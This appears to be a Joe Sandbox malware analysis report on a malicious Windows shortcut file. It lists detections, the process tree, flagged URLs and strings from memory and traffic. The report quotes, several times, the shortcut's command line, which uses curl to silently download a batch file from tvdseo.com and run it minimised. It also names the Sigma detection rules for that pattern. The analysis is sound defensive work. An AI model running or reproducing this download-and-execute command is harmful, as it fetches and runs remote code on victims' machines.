Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
document.lnk.download.lnk

Overview

General Information

Sample name:document.lnk.download.lnk
Analysis ID:1562561
MD5:504d8898a97dda2963425df8c5a04118
SHA1:0554cf0e2137e4a925e9137b9330491361c77011
SHA256:7a1d5aa394c347ff8606fa04a44cc507fab103c8167e52310ec683dbb005b4fd
Tags:Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Machine Learning detection for sample
Sigma detected: Curl Download And Execute Combination
Windows shortcut file (LNK) contains suspicious command line arguments
Creates a process in suspended mode (likely to inject code)
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Usage Of Web Request Commands And Cmdlets

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 3036 cmdline: "C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 6188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • curl.exe (PID: 5916 cmdline: curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
    • cmd.exe (PID: 3076 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UDkXtQleTB.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Curl Download And Execute Combination
Source: Process startedAuthor: Sreeman, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat, CommandLine: "C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat, ProcessId: 3036, ProcessName: cmd.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat, CommandLine: "C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat, ProcessId: 3036, ProcessName: cmd.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://tvdseo.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/file/quan.batSAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.19.4Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.19.4Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-app-store-ios/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/about/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=9.4.1Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/comments/feed/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-app-chplay/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=2411Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3ROp8lAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwaPGR_p.woff2)Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjxAwXjeu.woff2)Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/category/phan-mem/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.19.4)Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-270x270.pngAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwiPGQ.woff2)Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/url-short-short-link/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/file/quan.batDAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3Rep8lAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/p/tool-multi-zalo-su-dung-nhieu-zalo-tren-may-tinh/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/app/ShemaTuyenDung.phpAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-tiktok/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-shop-lazada/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.19.4Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.svg?v=3.19.4#fl-icons)Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjx4wXg.woff2)Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Bold.ttfAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=9.4Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/cart-2/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/remove-background-xoa-nen-anh-free/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-32x32.pngAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/style.css?ver=3.19.4Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/#organizationAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=325ad20e90dbc8889310Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-youtube/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?verAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/js/kk-star-ratings.min.js?ver=Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.19.4Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/table-of-contents-plus/front.min.js?ver=2411Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/category/tin-hoc-ab/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/file/quan.bateAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.js?ver=9.Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-shop-tmdt/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff2?v=3.19.4)Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-192x192.pngAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_PRO-removebg-1-510x213.pngAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=6.0Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/Inter-VariableFont_slntAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/xmlrpc.phpAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/css/kk-star-ratings.min.css?veAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff?v=3.19.4)Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.ttf?v=3.19.4)Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.0Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/js/tvdseo.jsAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/js/flatsome.js?ver=8e60d746741250b4dd4eAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/xmlrpc.php?rsdAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/iq-vo-cuc/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/file/quan.batAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome-live-searAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/cropped-LOGO-TVD-SEO-VUONG.pngAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-180x180.pngAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/wp-consent-api-integration.min.Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.19.4);Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-instagram/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/#websiteAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2022/01/LOGO_TVD_SEO_VUONG-removebg.pngAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-facebook/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/category/thongtinhay/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.0Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=9.4.1Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/google-site-kit/dist/assets/js/googlesitekit-consent-mode-3d64Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/cardo_normal_400.woff2Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-fanpage/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/my-account-2/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-google-map/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/wp-consent-api/assets/js/wp-consent-api.min.js?ver=1.0.7Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-shop-shoppe/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Regular.ttfAvira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/#/schema/logo/image/Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.0Avira URL Cloud: Label: phishing
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.2% probability
Machine Learning detection for sample
Source: document.lnk.download.lnkJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 104.21.81.137:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /file/quan.bat HTTP/1.1Host: tvdseo.comUser-Agent: curl/7.83.1Accept: */*
Source: UDkXtQleTB.bat.2.drString found in binary or memory: SEO TVD"},"image":{"@id":"https://tvdseo.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/102126481779000"]}]}</script> equals www.facebook.com (Facebook)
Source: UDkXtQleTB.bat.2.drString found in binary or memory: <li class="bullet-arrow"><a href="https://www.youtube.com/channel/UCUZToD8MAs4MWywND_9DStg"><span style="font-size: 15px;">Youtube D equals www.youtube.com (Youtube)
Source: UDkXtQleTB.bat.2.drString found in binary or memory: <li class="bullet-arrow"><a href="https://www.youtube.com/channel/UCjt7SG-LPi6OafmLxoc1ULg"><span style="font-size: 15px;">Youtube Tr equals www.youtube.com (Youtube)
Source: UDkXtQleTB.bat.2.drString found in binary or memory: <p><iframe src="https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Ftvdseo&tabs=timeline&width=500&height=500&small_header=false&adapt_container_width=false&hide_cover=false&show_facepile=true&appId=270453733610848" width="500" height="500" style="border:none;overflow:hidden" scrolling="no" frameborder="0" allowfullscreen="true" allow="autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share"></iframe></p> equals www.facebook.com (Facebook)
Source: global trafficDNS traffic detected: DNS query: tvdseo.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 17:01:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.2.15expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://tvdseo.com/wp-json/>; rel="https://api.w.org/"vary: Accept-Encodingplatform: hostingerpanel: hpanelcontent-security-policy: upgrade-insecure-requestsx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nvEicoSiJDmB7Y12x6ziuTJeaIUpVBDygvw6DEwaKrs7dK7%2B7cZzJIvvg7Fp1CiMmSsBnAC0n%2Bf1Vxjc3rEWpZ9cWbvlmqOvuCln4fcZY197F64mB5CRw8OHYw%2Bz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e83335fdaa0422b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2178&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=725&delivery_rate=1332116&cwnd=234&unsent_bytes=0&cid=f60b1835723be41a&ts=887&x=0"
Source: UDkXtQleTB.bat.2.drString found in binary or memory: http://www.dmca.com/Protection/Status.aspx?ID=502286c4-db26-4ff5-898e-3899d9fd8507
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://api.w.org/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://congdonginan.vn/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://gmpg.org/xfn/11
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://gravatar.com/dungk396
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://images.dmca.com/Badges/DMCABadgeHelper.min.js
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://images.dmca.com/Badges/dmca_protected_sml_120l.png?ID=502286c4-db26-4ff5-898e-3899d9fd8507
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://images.dmca.com/badges/dmca.css?ID=502286c4-db26-4ff5-898e-3899d9fd8507
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://marketing.tvdseo.com/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://news.google.com/publications/CAAqBwgKMP6toQswlri5Aw?hl=vi&amp;gl=VN&amp;ceid=VN%3Avi
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://schema.org
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/#/schema/logo/image/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/#organization
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/#website
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/?s=
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/about/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/app/ShemaTuyenDung.php
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/cart-2/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/category/dich-vu/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/category/hocseo/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/category/phan-mem/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/category/thongtinhay/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/category/tin-hoc-ab/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/category/wiki/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/comments/feed/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/dich-vu-seo-app-chplay/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/dich-vu-seo-app-store-ios/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/dich-vu-seo-facebook/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/dich-vu-seo-fanpage/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/dich-vu-seo-google-map/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/dich-vu-seo-instagram/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/dich-vu-seo-shop-lazada/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/dich-vu-seo-shop-shoppe/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/dich-vu-seo-shop-tiki/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/dich-vu-seo-shop-tmdt/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/dich-vu-seo-tiktok/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/dich-vu-seo-website/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/dich-vu-seo-youtube/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/feed/
Source: curl.exe, 00000002.00000002.1293018592.00000000034E0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000002.1293075206.0000000003628000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292708702.0000000003655000.00000004.00000020.00020000.00000000.sdmp, document.lnk.download.lnkString found in binary or memory: https://tvdseo.com/file/quan.bat
Source: curl.exe, 00000002.00000002.1293163205.0000000003655000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292708702.0000000003655000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tvdseo.com/file/quan.batD
Source: curl.exe, 00000002.00000002.1293075206.0000000003620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tvdseo.com/file/quan.batS
Source: curl.exe, 00000002.00000002.1293075206.0000000003628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tvdseo.com/file/quan.bate
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/iq-vo-cuc/
Source: curl.exe, 00000002.00000003.1292643132.000000000363C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292615927.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292409522.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292314128.0000000003693000.00000004.00000020.00020000.00000000.sdmp, UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/my-account-2/
Source: curl.exe, 00000002.00000003.1292643132.000000000363C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292615927.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292409522.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292314128.0000000003693000.00000004.00000020.00020000.00000000.sdmp, UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/my-account-2/lost-password/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/p/tool-multi-zalo-su-dung-nhieu-zalo-tren-may-tinh/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/remove-background-xoa-nen-anh-free/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/url-short-short-link/
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3ROp8l
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3Rep8l
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3Sup8.
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwaPGR_p.woff2)
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwiPGQ.woff2)
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjx4wXg.woff2)
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjxAwXjeu.woff2)
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.0
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.0
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.0
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=6.0
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/plugins/google-site-kit/dist/assets/js/googlesitekit-consent-mode-3d64
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/css/kk-star-ratings.min.css?ve
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/js/kk-star-ratings.min.js?ver=
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/plugins/table-of-contents-plus/front.min.js?ver=2411
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=2411
Source: curl.exe, 00000002.00000003.1292643132.000000000363C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292615927.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292409522.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292314128.0000000003693000.00000004.00000020.00020000.00000000.sdmp, UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks.css?ver=wc-9.4.1
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/Inter-VariableFont_slnt
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/cardo_normal_400.woff2
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=9.4.1
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.js?ver=9.
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=9.4.1
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/wp-consent-api-integration.min.
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=9.4
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/plugins/wp-consent-api/assets/js/wp-consent-api.min.js?ver=1.0.7
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.19.4
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.19.4
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.19.4)
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.19.4);
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.svg?v=3.19.4#fl-icons)
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.ttf?v=3.19.4)
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff2?v=3.19.4)
Source: UDkXtQleTB.bat.2.drString found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff?v=3.19.4)
